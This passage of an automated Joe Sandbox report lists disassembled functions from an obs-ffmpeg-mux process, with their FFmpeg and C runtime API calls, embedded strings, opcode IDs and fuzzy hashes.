                                                            • Instruction Fuzzy Hash: 5712B462F0E14386FBA45BB4F02467972A3FB40750F844175D6AA667C6DF3FE5808B0A
                                                            APIs
                                                            • avcodec_free_context.AVCODEC-60 ref: 00007FF71E742388
                                                            • avformat_free_context.AVFORMAT-60 ref: 00007FF71E7423CC
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74204A
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742065
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E742080
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E74209B
                                                              • Part of subcall function 00007FF71E742030: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF71E7423A2), ref: 00007FF71E7420B6
                                                            • av_free.AVUTIL-58 ref: 00007FF71E7423B1
                                                            • avio_context_free.AVFORMAT-60 ref: 00007FF71E7423BD
                                                            • avio_close.AVFORMAT-60 ref: 00007FF71E7423C4
                                                            • avcodec_free_context.AVCODEC-60 ref: 00007FF71E742402
                                                            • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF71E742415
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: strncmp$avcodec_free_context$av_freeavformat_free_contextavio_closeavio_context_freefree
                                                            • String ID:
                                                            • API String ID: 1086289117-0
                                                            • Opcode ID: 5750c0e3cd2fb8260dfd87b4c22098c1e8e3cbc363b4994d39577057d30215b3
                                                            • Instruction ID: dbde5896fff89481e5d9d154fbb7d3a2435b619125e0813ddb931b0ec31d1098
                                                            • Opcode Fuzzy Hash: 5750c0e3cd2fb8260dfd87b4c22098c1e8e3cbc363b4994d39577057d30215b3
                                                            • Instruction Fuzzy Hash: 09212F32A14A9582FB11BF25F45127CA3A0FB48F98F855536DA4D4766ACF38E45E8320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiStringWide
                                                            • String ID:
                                                            • API String ID: 2829165498-0
                                                            • Opcode ID: 19bdea05b89112efca26a76af5801f63f8593368eda608c20a3d38d473ed6fde
                                                            • Instruction ID: 42b24d1edf3e953c8dad597328cbfd16954eddce7ad38aa0048b0de29ef253e6
                                                            • Opcode Fuzzy Hash: 19bdea05b89112efca26a76af5801f63f8593368eda608c20a3d38d473ed6fde
                                                            • Instruction Fuzzy Hash: 2E81D272B0A74186EB208F31E4602797296FF447A4F140679EA5D67BDADF3FD4048708
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: type_info::_name_internal_method$LockitMpunctchar_traitsstd::_$Concurrency::details::EmptyGetfacetLockit::_Lockit::~_Queue::StructuredWorkstd::locale::_
                                                            • String ID:
                                                            • API String ID: 1948620569-0
                                                            • Opcode ID: db001cbab32b706852569352078046197d6a6324535291e71047bb6a88349dca
                                                            • Instruction ID: 39feaf06bc53a67843cce2f3164515ee8b32d28989441e5c6ca00a360451647f
                                                            • Opcode Fuzzy Hash: db001cbab32b706852569352078046197d6a6324535291e71047bb6a88349dca
                                                            • Instruction Fuzzy Hash: D191193260DAC186E6A1DB15E4A03EEB7A1F7C9780F404532EA8D53BAADF7DD544CB04
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Fgetc
                                                            • String ID:
                                                            • API String ID: 1720979605-0
                                                            • Opcode ID: 28baa0b0cff05df5d8ba91b69c61c4991e3271d68468491054d9f83255bc8580
                                                            • Instruction ID: 7d4ea26cc70fea56043afd74ed0ee75e4e5fa3a39737d8e075005e83fd37aea6
                                                            • Opcode Fuzzy Hash: 28baa0b0cff05df5d8ba91b69c61c4991e3271d68468491054d9f83255bc8580
                                                            • Instruction Fuzzy Hash: D1814122A1E68186DA60DB65E4603BEB7A2FBC1740F500132E78D63BABDF3DD444CB44
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID:
                                                            • API String ID: 3215553584-0
                                                            • Opcode ID: 2b2e7281846eac4043168013672503d634fe1231328cb35edb1c4f3e79524dcf
                                                            • Instruction ID: ce40f54c660d338a534c9aaf16140f69411e155bac6897da953e3c6c9ba33d2f
                                                            • Opcode Fuzzy Hash: 2b2e7281846eac4043168013672503d634fe1231328cb35edb1c4f3e79524dcf
                                                            • Instruction Fuzzy Hash: EA516232B0B646C5E7915F3490B12BDBB92AB45B44F5580B1D69D273C7CE2FB446830A
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: InvalidatePaintRect$BeginMessagePostProcQuitWindow
                                                            • String ID:
                                                            • API String ID: 1653709837-0
                                                            • Opcode ID: 4e47f12e20544a685814b25160754904f3f71da83a83e271505d26e52fa5ec43
                                                            • Instruction ID: 34a5260ac9290fba83cba17370ebcb06c6b0668d8d2b002d54b07b5256299297
                                                            • Opcode Fuzzy Hash: 4e47f12e20544a685814b25160754904f3f71da83a83e271505d26e52fa5ec43
                                                            • Instruction Fuzzy Hash: 7C410C32B1D78287EB718B25E46437A73A2FB89741F404176E58D52BA6CF3ED544CB08
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Mpunct$ctypestd::ios_base::width
                                                            • String ID: @
                                                            • API String ID: 3075750325-2766056989
                                                            • Opcode ID: 9bf69f025c1eb2cbc33cc278e590e33956c0914addd07cff6ffa4e72e4424e43
                                                            • Instruction ID: 089c08cbe891515ca7b39a909c694a9603f110a0eb0b22bd4c7f37f00b8ce112
                                                            • Opcode Fuzzy Hash: 9bf69f025c1eb2cbc33cc278e590e33956c0914addd07cff6ffa4e72e4424e43
                                                            • Instruction Fuzzy Hash: 70F1073260EAC585DAA0DA55E4A53EFB7A2F7C8780F400132DACD93B6ADF6DD540CB44
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                            • String ID: csm$csm$csm
                                                            • API String ID: 3523768491-393685449
                                                            • Opcode ID: e32796bb40b43773fb6ff2aec2c181e8fb4c61f107ad230eeb5657ec601adcee
                                                            • Instruction ID: 6d9ea1162b9c4a66a3bd7dac4a2a5818b0727dc6c986b250dc700b0d06c25fc6
                                                            • Opcode Fuzzy Hash: e32796bb40b43773fb6ff2aec2c181e8fb4c61f107ad230eeb5657ec601adcee
                                                            • Instruction Fuzzy Hash: 2FE1E072A097828AEB219F38D4A02BC77A2FB45748F140175DE8D67797CF3AE085C744
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Object$Select$CreateDeleteLineMove
                                                            • String ID:
                                                            • API String ID: 3907703346-0
                                                            • Opcode ID: 7131f109ee3d4d982530c122e500a4da8b05a98b84a19a0d41db410ebf70dfcc
                                                            • Instruction ID: 2d477a2d468958dba95b4c23a1cfdb188f199b31c228fc827634c00eaba0c84e
                                                            • Opcode Fuzzy Hash: 7131f109ee3d4d982530c122e500a4da8b05a98b84a19a0d41db410ebf70dfcc
                                                            • Instruction Fuzzy Hash: A831223671EA4282DA20DF21F86016EB362FFC8795F504131E58E53B6ACF3EE5448744
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: AdjustPointer
                                                            • String ID:
                                                            • API String ID: 1740715915-0
                                                            • Opcode ID: 11bdc3168604b98f9a22173b748ebd876aaedb3b5a2e0641ea68a9a9cd424268
                                                            • Instruction ID: 80755538312f4d2d1cb2068ab3731c4904f3c6af2101546dc461268304a8ad75
                                                            • Opcode Fuzzy Hash: 11bdc3168604b98f9a22173b748ebd876aaedb3b5a2e0641ea68a9a9cd424268
                                                            • Instruction Fuzzy Hash: 98B19321B0F64281EA65DB71D5A067863A6AF84F84F0984B5DE4D277CBDF3FE4418348
                                                            APIs
                                                            • FlsGetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A0B7
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A0D6
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A0FE
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A10F
                                                            • FlsSetValue.KERNEL32(?,?,?,00007FFDA382675F,?,?,00000000,00007FFDA38269FA,?,?,?,?,?,00007FFDA3826986), ref: 00007FFDA382A120
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Value
                                                            • String ID:
                                                            • API String ID: 3702945584-0
                                                            • Opcode ID: 377d35087988872d8a55d92d034d61dff08062d6b5dda0b41b9dc53d8abc3ca9
                                                            • Instruction ID: 4c95e0d272c0df815b65f17da71c496decbc6c66f8fb53c1e9a96d6eb58951e4
                                                            • Opcode Fuzzy Hash: 377d35087988872d8a55d92d034d61dff08062d6b5dda0b41b9dc53d8abc3ca9
                                                            • Instruction Fuzzy Hash: D8118E20F0F24281FA5897B5AA7117921436F847F0F4847B6E83E267D7EE2FF401860A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: 91ef34f36c1f7546d25e11d7110aae56368f81ca4d9656bde594932d18e2aa9e
                                                            • Instruction ID: e37d7993a6e912e01cb50580ece1aaa5a8d447984f9bf7d2abb3da4442b61f6b
                                                            • Opcode Fuzzy Hash: 91ef34f36c1f7546d25e11d7110aae56368f81ca4d9656bde594932d18e2aa9e
                                                            • Instruction Fuzzy Hash: 5281D232F0F20295F76D4F35913027926A2AB10B44F55A0B1FA0A77387DFAFE805830A
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                            • API String ID: 3215553584-1196891531
                                                            • Opcode ID: f74006fff242e472b29e4078f17dfa188ac3fde7ef4abc39dd34ca6636835c7a
                                                            • Instruction ID: bcf2e8796ba8367c14f2a5809e6bd5ffede9b6deb3d29d530a519c6e3f7bf4c1
                                                            • Opcode Fuzzy Hash: f74006fff242e472b29e4078f17dfa188ac3fde7ef4abc39dd34ca6636835c7a
                                                            • Instruction Fuzzy Hash: 5281F131F0E21286FB7D4B38E27027C2A92AF15748F1550B1D96E76397CA6FA8419309
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: 6c71ad19f1e21a44dbcf63c70ddd50b8183cf0e6cc872e9bc7b2f8920246b6e0
                                                            • Instruction ID: 465dcaff7894fa06eca4594ada3ee0d93e400cf78257c68c61bade4ccd67ef9d
                                                            • Opcode Fuzzy Hash: 6c71ad19f1e21a44dbcf63c70ddd50b8183cf0e6cc872e9bc7b2f8920246b6e0
                                                            • Instruction Fuzzy Hash: C891D173B09B818AE711CB75E8902AC77A1FB44788F14416AEB8C27796DF3AD195CB04
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: CallEncodePointerTranslator
                                                            • String ID: MOC$RCC
                                                            • API String ID: 3544855599-2084237596
                                                            • Opcode ID: 7eeedc7fa1acfeb619eb1d233461f354d54350560f15a7ab1f718499c444a672
                                                            • Instruction ID: 2ebc682c904439e97f1358ca6e088d00e24d33befe14464fb4789fcffd8dca5f
                                                            • Opcode Fuzzy Hash: 7eeedc7fa1acfeb619eb1d233461f354d54350560f15a7ab1f718499c444a672
                                                            • Instruction Fuzzy Hash: 0061C332A09BC582DB319F25E4503AAB7A1FB84794F044275EB9D13B96CF7ED190CB04
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                            • String ID: csm$csm
                                                            • API String ID: 3896166516-3733052814
                                                            • Opcode ID: 4714c09397db957e0b95a3ab11810a10cb1a4068a4c87fb034aee45988618846
                                                            • Instruction ID: 9e1626c34d77fae88fa8b6224a4b4ed23b689b2f8bdd5d1abf1277026223140e
                                                            • Opcode Fuzzy Hash: 4714c09397db957e0b95a3ab11810a10cb1a4068a4c87fb034aee45988618846
                                                            • Instruction Fuzzy Hash: DC51B132B0A3828BEB658F31D0642A977A2EB54B84F1441B5DA4D63BC6CF7FE450C709
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID: 0-3916222277
                                                            • Opcode ID: a3b5a55c53e367a828c0e4b41b290200ff18b0575709f1b1202722b130669e17
                                                            • Instruction ID: 94899b7c698b00a3e140552bc07b6404f8d95c54872221d58a8a6168195f4b22
                                                            • Opcode Fuzzy Hash: a3b5a55c53e367a828c0e4b41b290200ff18b0575709f1b1202722b130669e17
                                                            • Instruction Fuzzy Hash: 36613F22B0E6C186E6A0DB14F0603AEB7A2FB81341F500136E68D57B97DF2ED884CB45
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Concurrency::details::$Affinity::operator!=Hardwareshared_ptr$EmptyFind_elemQueue::StructuredWorktype_info::_name_internal_method
                                                            • String ID: 0123456789ABCDEFabcdef-+Xx
                                                            • API String ID: 3988152214-2799312399
                                                            • Opcode ID: b3a3f6c7a8a4500005e8f90467c0d186e544c593074fa0cf1e63d2feea6031bd
                                                            • Instruction ID: da2dce02bdf00c36e531d24f7ad79f03d3e72bdaae31582ad3a55ef819fa2d2a
                                                            • Opcode Fuzzy Hash: b3a3f6c7a8a4500005e8f90467c0d186e544c593074fa0cf1e63d2feea6031bd
                                                            • Instruction Fuzzy Hash: 5F217132B0EAC584D6619B15E4601BFB7A2E7C5784F404832E6CD93BABCF2DD845CB04
                                                            APIs
                                                            • avformat_new_stream.AVFORMAT-60(?,?,?,00007FF71E7412F1), ref: 00007FF71E7429AD
                                                            • __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,00007FF71E7412F1), ref: 00007FF71E7429C0
                                                            • fprintf.MSPDB140-MSVCRT ref: 00007FF71E7429D3
                                                              • Part of subcall function 00007FF71E742320: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,00007FF71E7429D8,?,?,?,00007FF71E7412F1), ref: 00007FF71E742357
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2315304374.00007FF71E741000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF71E740000, based on PE: true
                                                            • Associated: 00000007.00000002.2315272675.00007FF71E740000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315346958.00007FF71E745000.00000002.00000001.01000000.00000005.sdmp
                                                            • Associated: 00000007.00000002.2315376130.00007FF71E749000.00000002.00000001.01000000.00000005.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ff71e740000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: __acrt_iob_func__stdio_common_vfprintfavformat_new_streamfprintf
                                                            • String ID: Couldn't create stream for encoder '%s'
                                                            • API String ID: 306180413-3485626053
                                                            • Opcode ID: 97d36ac62344db8522675eb32487dc47749b1acbad2880230df25e82e6eb689d
                                                            • Instruction ID: 061a4a44a8d58641f85c20437f192cb7effb392e698dfc884365dba581151681
                                                            • Opcode Fuzzy Hash: 97d36ac62344db8522675eb32487dc47749b1acbad2880230df25e82e6eb689d
                                                            • Instruction Fuzzy Hash: 8DF06D32B19B8082EA44DB16F451069A7A0FB8CFE0B88D035EE5D03B59DF3CE559CB00
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_7ffda3780000_obs-ffmpeg-mux.jbxd
                                                            Similarity
                                                            • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getfacetstd::locale::_
                                                            • String ID:
                                                            • API String ID: 228209623-0
                                                            • Opcode ID: cf0caf64f65ac75084a90a768f0ab90963d8431ec8d5781725f49993c3f909eb
                                                            • Instruction ID: c8507b57e36124c1cab19cd453b6555e8cfda2cfd5f3adbf0ca43cf793449a7b
                                                            • Opcode Fuzzy Hash: cf0caf64f65ac75084a90a768f0ab90963d8431ec8d5781725f49993c3f909eb
                                                            • Instruction Fuzzy Hash: DF214F2271EA4181DA90DB15F49026AB7A5FBC47A0F501236FACE13BAADE3ED540CB04
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.2335026233.00007FFDA3781000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDA3780000, based on PE: true
                                                            • Associated: 00000007.00000002.2334990635.00007FFDA3780000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA3845000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335194733.00007FFDA385D000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335606542.00007FFDA386E000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2335722973.00007FFDA386F000.00000008.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336848003.00007FFDA38D5000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 00000007.00000002.2336967154.00007FFDA38DA000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
